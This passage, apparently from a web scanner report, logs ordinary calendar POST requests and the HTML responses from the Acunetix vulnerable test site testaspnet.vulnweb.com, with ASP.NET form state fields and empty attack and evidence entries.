</TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1185 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,185 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8278&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAar%2FjitoIZGRkWz97XtCPcvdZcEfYYYhEGsRhmBc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLH5PTZCALtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAimbbMo39hISLz2luR%2Bj%2BAEjdJfN
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:42 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAar/jitoIZGRkWz97XtCPcvdZcEfYYYhEGsRhmBc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH5PTZCALtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAimbbMo39hISLz2luR+j+AEjdJfN" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:White" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8527&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCARgCOTtsIZGRkN1KvetM99LiVW9AFOi8ckQFnKgY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLhu%2FpiAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb%2FeCQLmnb%2FeCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne%2FDDALmne%2FDDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ%2B5AwLmnZ%2B5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU%2FAvukpT8C%2B6TZ0wkC%2B6TZ0wkC%2B6TN9gIC%2B6TN9gIC%2B6ThjQoC%2B6ThjQoC%2B6SVoAMC%2B6SVoAMC%2B6SJxwwC%2B6SJxwwC%2B6T9rAkC%2B6T9rAkC%2B6SRwwIC%2B6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu%2F%2BQ8C3Mu%2F%2BQ8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL%2B9cJAtzL%2B9cJAtzL7%2BoCAtzL7%2BoCAtzLw9MPAtzLw9MPAtzL9%2FYIAtzL9%2FYIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDcvFbDGpWDDVcLsSON8C56eSZcU4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:44 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCARgCOTtsIZGRkN1KvetM99LiVW9AFOi8ckQFnKgY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLhu/piAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb/eCQLmnb/eCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne/DDALmne/DDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ+5AwLmnZ+5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU/AvukpT8C+6TZ0wkC+6TZ0wkC+6TN9gIC+6TN9gIC+6ThjQoC+6ThjQoC+6SVoAMC+6SVoAMC+6SJxwwC+6SJxwwC+6T9rAkC+6T9rAkC+6SRwwIC+6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu/+Q8C3Mu/+Q8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL+9cJAtzL+9cJAtzL7+oCAtzL7+oCAtzLw9MPAtzLw9MPAtzL9/YIAtzL9/YIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDcvFbDGpWDDVcLsSON8C56eSZcU4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:White" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a 